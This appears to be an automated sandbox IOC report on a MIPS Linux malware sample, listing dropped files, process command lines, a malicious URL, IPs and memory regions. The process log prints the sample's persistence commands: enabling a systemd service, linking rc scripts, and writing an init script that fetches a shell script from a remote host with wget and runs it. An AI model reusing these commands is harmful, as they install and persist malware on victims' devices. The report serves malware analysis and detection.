IOC Report
mipsel.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
mipsel.nn.elf
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/mipsel.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.7muIa1 (deleted)
ASCII text
dropped
/tmp/qemu-open.8o8Kh2 (deleted)
ASCII text, with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/mipsel.nn.elf
/tmp/mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/mipsel.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
/tmp/mipsel.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 24 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/
unknown

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
45.202.35.64
unknown
Seychelles

Memdumps

Base Address
Regiontype
Protect
Malicious
7fc008419000
page execute read
 malicious
7fc08eb7d000
page read and write
7fc088021000
page read and write
7fc00845a000
page read and write
7fc08f599000
page read and write
7fc08f470000
page read and write
55b14bcca000
page read and write
7fc08ef41000
page read and write
7fc08e8cd000
page read and write
55b14bcc0000
page read and write
7ffca252b000
page read and write
7fc08e8bf000
page read and write
7fc08e0b7000
page read and write
7ffca25a2000
page execute read
55b14dcdf000
page read and write
7fc08ef5e000
page read and write
7fc08f5a1000
page read and write
7fc08f28f000
page read and write
7fc088000000
page read and write
55b14ba38000
page execute read
55b14ec5e000
page read and write
7fc08ef1e000
page read and write
55b14dcc8000
page execute and read and write
7fc00845e000
page read and write
7fc08f5e6000
page read and write
There are 15 hidden memdumps, click here to show them.